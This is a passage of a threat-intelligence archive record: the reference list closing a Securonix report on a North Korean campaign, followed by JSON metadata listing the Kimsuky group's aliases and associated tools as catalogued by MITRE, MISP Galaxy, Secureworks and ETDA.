Malware\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-deepgosu-attack-campaign/\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 21 of 22\n\n2. Kimsuky organization uses Dropbox cloud to implement action analysis\r\nhttps://mp.weixin.qq.com/s?\r\n__biz=Mzg2NjgzNjA5NQ%3D%3D\u0026mid=2247522061\u0026idx=1\u0026sn=22e56ee213d9e5229371ad3e082ebfab\r\n3. North Korean Advanced Persistent Threat Focus: Kimsuky\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa20-301a\r\nSource: https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-att\r\nacks/\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 22 of 22", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia", "MITRE" ], "references": [ "https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/" ], "report_names": [ "analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434646, "ts_updated_at": 1775792260, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d7efaadd97ce3dcbbaabda8652cd1ce4467f3b1c.pdf", "text": "https://archive.orkl.eu/d7efaadd97ce3dcbbaabda8652cd1ce4467f3b1c.txt", "img": "https://archive.orkl.eu/d7efaadd97ce3dcbbaabda8652cd1ce4467f3b1c.jpg" } }